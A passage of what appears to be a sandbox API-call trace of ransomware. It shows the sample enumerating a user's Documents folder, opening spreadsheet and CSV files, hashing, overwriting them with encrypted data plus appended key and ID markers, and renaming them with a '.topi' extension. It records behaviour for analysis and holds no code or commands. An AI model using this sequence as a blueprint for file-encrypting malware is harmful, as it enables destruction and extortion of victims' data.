(lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nm0KmSzid6iXp.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nm0kmszid6ixp.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\Nm0KmSzid6iXp.xlsx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\nm0kmszid6ixp.xlsx.topi")) returned 1 [0095.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.099] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.099] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.100] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.100] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5a7a9f80, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x5c4f8e60, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x5c4f8e60, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Outlook Files", cAlternateFileName="OUTLOO~1")) returned 1 [0095.100] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PbB1.xlsx") returned=".xlsx" [0095.100] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PbB1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pbb1.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.100] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=55895) returned 1 [0095.100] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.103] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xda31, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.103] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0095.104] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df3c0) returned 1 [0095.104] CryptCreateHash (in: hProv=0x6df3c0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0095.105] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0095.105] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0095.105] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0095.105] GetLastError () returned 0x0 [0095.105] CryptDestroyHash (hHash=0x31c7580) returned 1 [0095.105] CryptReleaseContext (hProv=0x6df3c0, dwFlags=0x0) returned 1 [0095.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.105] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0095.105] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.105] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0095.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xda60) returned 0x9a06a00 [0095.105] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0095.105] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1800 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9318 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99f1848 [0095.105] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9330 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0095.106] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e8eb0 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x31d01f0 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9378 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99d9360 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0095.106] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0095.106] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.106] GetCurrentThreadId () returned 0x8c4 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99f5a40 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df3c0 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.107] GetCurrentThreadId () returned 0x8c4 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x99e4988 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4988 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99ded50 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb510 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d89a0 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0095.107] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.107] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9378 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9348 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e80 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8eb0 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9f8 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d8e68 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d9390 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99d8e68 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8eb0 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314c608 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314c768 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99d9360 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x204) returned 0x99e8eb0 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d89a0 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191ac0 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e68 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x210) returned 0x99e9300 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c768 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10c) returned 0x31b6350 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0095.108] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x108) returned 0x3191bd8 [0095.108] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9360 | out: hHeap=0x680000) returned 1 [0095.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x200) returned 0x31d5100 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191ac0 | out: hHeap=0x680000) returned 1 [0095.109] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df3c0 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99ded50 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99def60 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314c608 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3191bd8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9390 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d8e80 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9378 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9348 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ce620 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f78 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99deb40 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9330 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99f1848 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e8eb0 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dee58 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cb510 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31919a8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0e8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9a8 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0095.109] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1b68 | out: hHeap=0x680000) returned 1 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e1970 | out: hHeap=0x680000) returned 1 [0095.110] WriteFile (in: hFile=0x6a8, lpBuffer=0x9a06a00*, nNumberOfBytesToWrite=0xda52, lpNumberOfBytesWritten=0x9ccfb14, lpOverlapped=0x0 | out: lpBuffer=0x9a06a00*, lpNumberOfBytesWritten=0x9ccfb14*=0xda52, lpOverlapped=0x0) returned 1 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a06a00 | out: hHeap=0x680000) returned 1 [0095.110] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0xda57, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0095.110] WriteFile (in: hFile=0x6a8, lpBuffer=0x99dea38*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x99dea38*, lpNumberOfBytesWritten=0x9ccfb50*=0x100, lpOverlapped=0x0) returned 1 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99dea38 | out: hHeap=0x680000) returned 1 [0095.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x428) returned 0x31d01f0 [0095.110] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", cchWideChar=-1, lpMultiByteStr=0x31d01f0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ywA3qgOrH00u8DIzdAJmeI3ndBL6uaF5KTvM8FRT", lpUsedDefaultChar=0x0) returned 41 [0095.110] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x430) returned 0x31d0980 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d01f0 | out: hHeap=0x680000) returned 1 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.110] WriteFile (in: hFile=0x6a8, lpBuffer=0x31d0980*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x31d0980*, lpNumberOfBytesWritten=0x9ccfb50*=0x28, lpOverlapped=0x0) returned 1 [0095.110] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d0980 | out: hHeap=0x680000) returned 1 [0095.110] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0095.110] WriteFile (in: hFile=0x6a8, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9ccfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9ccfb50*=0x26, lpOverlapped=0x0) returned 1 [0095.110] CloseHandle (hObject=0x6a8) returned 1 [0095.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x70) returned 0x3161e60 [0095.111] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x870) returned 0x31cf750 [0095.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x3161e60 | out: hHeap=0x680000) returned 1 [0095.112] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PbB1.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pbb1.xlsx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\PbB1.xlsx.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\pbb1.xlsx.topi")) returned 1 [0095.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0095.112] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0095.112] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0095.113] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b3f60 | out: hHeap=0x680000) returned 1 [0095.113] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x75804600, ftCreationTime.dwHighDateTime=0x1d5b9ce, ftLastAccessTime.dwLowDateTime=0x35d47600, ftLastAccessTime.dwHighDateTime=0x1d5bd4f, ftLastWriteTime.dwLowDateTime=0x35d47600, ftLastWriteTime.dwHighDateTime=0x1d5bd4f, nFileSizeHigh=0x0, nFileSizeLow=0x176a3, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="QDvr5quvK.csv", cAlternateFileName="QDVR5Q~1.CSV")) returned 1 [0095.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x60) returned 0x316df90 [0095.113] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8e) returned 0x31b3f60 [0095.114] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316df90 | out: hHeap=0x680000) returned 1 [0095.114] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QDvr5quvK.csv") returned=".csv" [0095.114] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\QDvr5quvK.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\qdvr5quvk.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0095.114] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=95907) returned 1 [0095.114] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0095.116] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x1767d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: 